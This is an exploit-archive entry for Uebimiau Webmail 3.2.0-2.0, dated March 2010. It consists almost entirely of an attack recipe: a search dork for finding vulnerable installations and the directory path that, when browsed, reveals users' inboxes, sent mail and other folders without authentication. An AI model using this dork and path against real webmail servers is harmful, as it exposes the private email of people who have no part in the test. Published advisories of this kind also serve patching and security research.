id: 11225
date: 03/09/2010
title: Uebimiau Webmail v3.2.0-2.0 | Email Disclosure Vulnerability
author: R4vax
cves: 

============================================================
Uebimiau Webmail v3.2.0-2.0 | Email Disclosure Vulnerability
============================================================

# Exploit Title: Uebimiau Webmail v3.2.0-2.0 | Email Disclosure
# Date: 09 March 2010
# Author: Z3r0c0re, R4vax
# Software Link: http://www.uebimiau.org/download.php
# Version: 3.2.0-2.0
# Tested on: php
# Code :
*********************************************************
* Uebimiau Webmail Email Disclosure *
*********************************************************
* D0rk:  *
* "Uebimiau Webmail v3.2.0-2.0"  *
*********************************************************
* Vuln:  *
* http://[host]/[path]/inc/database  *
*********************************************************
* Desc:  *
* accessing these directores lets you view the users- *
* inboxes and sent emails and any other folders the- *
* user may have.     *
*********************************************************



#  0day.today [2023-03-22]  #